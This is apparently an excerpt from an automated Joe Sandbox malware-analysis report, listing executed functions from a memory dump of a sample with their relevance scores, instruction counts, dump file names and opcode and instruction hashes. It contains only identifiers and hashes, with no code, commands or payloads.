                        • Opcode Fuzzy Hash: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                        • Instruction Fuzzy Hash: B3A001746050109B8689DA58D991818B7A2ABC9219728C4ADA819CB25ACF33E9039A44

                        Executed Functions

                        Function 013A1358 Relevance: .5, Instructions: 457COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000F.00000002.2299649928.00000000013A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_15_2_13a0000_xNgpESfQOvfb.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 4ff88198d4c3d0ce100483a2fdcdf81a28cc8ad81da6fecf5d44c13ca45d4ab2
                        • Instruction ID: e31b377cf189cdadbd3c64c77ed7903cd8103fbe99f786d6d950e3b3dc085090
                        • Opcode Fuzzy Hash: 4ff88198d4c3d0ce100483a2fdcdf81a28cc8ad81da6fecf5d44c13ca45d4ab2
                        • Instruction Fuzzy Hash: 8DF17134B002059FDB18EB7AE858B6E7BB7FFC8300F548568E5069B3A5DE749C418B81
                        Function 013A1128 Relevance: .8, Instructions: 848COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000F.00000002.2299649928.00000000013A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_15_2_13a0000_xNgpESfQOvfb.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b0502f15ad99c85070cb61deab97f303758c26bbf2db29ad4f1f9bd557a1cd8c
                        • Instruction ID: 1c8beef463b63d3f110d484b6283acfee286ebae484bd14ff4b6bc853426897b
                        • Opcode Fuzzy Hash: b0502f15ad99c85070cb61deab97f303758c26bbf2db29ad4f1f9bd557a1cd8c
                        • Instruction Fuzzy Hash: 1EE1AF34B002458FDB19EB7AE8A866D3FB2EFC9300F148569D506DB3A5DE789C45CB81
                        Function 013A14E5 Relevance: .3, Instructions: 261COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000F.00000002.2299649928.00000000013A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_15_2_13a0000_xNgpESfQOvfb.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 3611095259392ce69ce915d8f4e4e16d25ad5bf2568e5066b761e6a9abc5eba4
                        • Instruction ID: 53f9c8070f5cf3e5834457ce39da5b80079df6e8a9586c665fb853075893e5d8
                        • Opcode Fuzzy Hash: 3611095259392ce69ce915d8f4e4e16d25ad5bf2568e5066b761e6a9abc5eba4
                        • Instruction Fuzzy Hash: 1B91AF34B002058FEB18EB7AD86876E7AE7FFC8310F548529D90A9B395DF759C418B81
                        Function 013A0D38 Relevance: .1, Instructions: 129COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000F.00000002.2299649928.00000000013A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_15_2_13a0000_xNgpESfQOvfb.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 461a61d1a0f425a070ae7fcf7eb75ece2b7b0271a66a689fbde4f64c167ecdf8
                        • Instruction ID: fe291bd94983f61d1093a656fac3faafbe074a391ba80cabff6fc64df07bd221
                        • Opcode Fuzzy Hash: 461a61d1a0f425a070ae7fcf7eb75ece2b7b0271a66a689fbde4f64c167ecdf8
                        • Instruction Fuzzy Hash: 7041DE35B00209DFDB08EBF9C8546AEBFBAEFC9310B144069D50ADB346DE749C428B51
                        Function 013A0E58 Relevance: .1, Instructions: 89COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000F.00000002.2299649928.00000000013A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_15_2_13a0000_xNgpESfQOvfb.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 61c1789e91d549011bd57ca45291b844b4a9b9011f1001dfe7116862a71d0ad0
                        • Instruction ID: d6f5bf55a46dae4838afd17a1944bb32fa3ba40b07a01b5bf800b65824d19ddd
                        • Opcode Fuzzy Hash: 61c1789e91d549011bd57ca45291b844b4a9b9011f1001dfe7116862a71d0ad0
                        • Instruction Fuzzy Hash: 9521F330B022968FCB48EB79895467F7BF6EFC9200B5484A9E509DB395EE74CC06C791
                        Function 013A0E48 Relevance: .1, Instructions: 85COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000F.00000002.2299649928.00000000013A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_15_2_13a0000_xNgpESfQOvfb.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d978d0289be4b4c66cf2939150e7deed4caece1f409c7952701415c8e59881da
                        • Instruction ID: c7757fd48a24b2710e5fab64de3ffc9c1e9e729d1ceacc02e45ef7a06e9df9b7
                        • Opcode Fuzzy Hash: d978d0289be4b4c66cf2939150e7deed4caece1f409c7952701415c8e59881da
                        • Instruction Fuzzy Hash: 65213530B022968FCB48DB7D8850A7F7BF6EFC9204B5480A9E409EB386DE309C059791
                        Function 013A0C22 Relevance: .1, Instructions: 74COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000F.00000002.2299649928.00000000013A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_15_2_13a0000_xNgpESfQOvfb.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 0f8f133bfe23af5c662599e3b7fc1e6402f6449d8ec730a9f08b078969a62ca3
                        • Instruction ID: 06586e14742d85c743bb98e30feae4ee97b911c4d65a17925567582d91ffb536
                        • Opcode Fuzzy Hash: 0f8f133bfe23af5c662599e3b7fc1e6402f6449d8ec730a9f08b078969a62ca3
                        • Instruction Fuzzy Hash: 0D318D34A0020ADFDB05EBBAD8506ADBFB6FF89300B1045A9D515AB341DBB46E84CF51
                        Function 013A0959 Relevance: .1, Instructions: 70COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000F.00000002.2299649928.00000000013A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_15_2_13a0000_xNgpESfQOvfb.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6760a367208e3d55f0861c3c8b200b044fa60ffbe1817f7bcd2a3a3056f0077f
                        • Instruction ID: 30ffeafaf90b059fee301ba72deef50411ba9f9cf5e39516599bcb96cd8aa288
                        • Opcode Fuzzy Hash: 6760a367208e3d55f0861c3c8b200b044fa60ffbe1817f7bcd2a3a3056f0077f
                        • Instruction Fuzzy Hash: E321BE30A04208CFDB48EFB8D8946AE7BF1EF89300F5485A9D505DB295EB30AD14CB81
                        Function 013A0C30 Relevance: .1, Instructions: 69COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000F.00000002.2299649928.00000000013A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_15_2_13a0000_xNgpESfQOvfb.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: fdebca1a32dfcaf0762c38b56b7e6da2f8d5400b40397a5a690a83ea8fb14e25
                        • Instruction ID: 76c4a26de57277d1858bd5cf5ff1b37d5dd1ee19e5f9535634a27045cd56f41d
                        • Opcode Fuzzy Hash: fdebca1a32dfcaf0762c38b56b7e6da2f8d5400b40397a5a690a83ea8fb14e25
                        • Instruction Fuzzy Hash: AD213D74A0020ADFDB04EBFAD9546ADBBB6FF88300F104569D515AB341DB746E80CF51
                        Function 013A0838 Relevance: .1, Instructions: 59COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000F.00000002.2299649928.00000000013A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_15_2_13a0000_xNgpESfQOvfb.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 5e6a65f855d8a298fee1324ea2b78f0068b82865871cecd1b8e1b36226a7a850
                        • Instruction ID: 350903c29a031bc4d1260122734c9fc2eacf207a851b09920664997167e1eaaa
                        • Opcode Fuzzy Hash: 5e6a65f855d8a298fee1324ea2b78f0068b82865871cecd1b8e1b36226a7a850
                        • Instruction Fuzzy Hash: 4D21AC3810024ACFDB09DFABFA909553F79FB89304704669CD5149F216DABC6D8ADF81
                        Function 013A0848 Relevance: .1, Instructions: 53COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000F.00000002.2299649928.00000000013A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_15_2_13a0000_xNgpESfQOvfb.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 273268ce638b59e4c6ac69090026cd3a081395077b32e57127c61de5c22637e6
                        • Instruction ID: 1eddf0d2bca4243ffed189ae45391ef71c58c3a36a0d545af01ec12de4ee7ae3
                        • Opcode Fuzzy Hash: 273268ce638b59e4c6ac69090026cd3a081395077b32e57127c61de5c22637e6
                        • Instruction Fuzzy Hash: F521BE3810024FCFDB19DFABFA909553BB9FB88304700A69C95149F315DABC6D8A8F81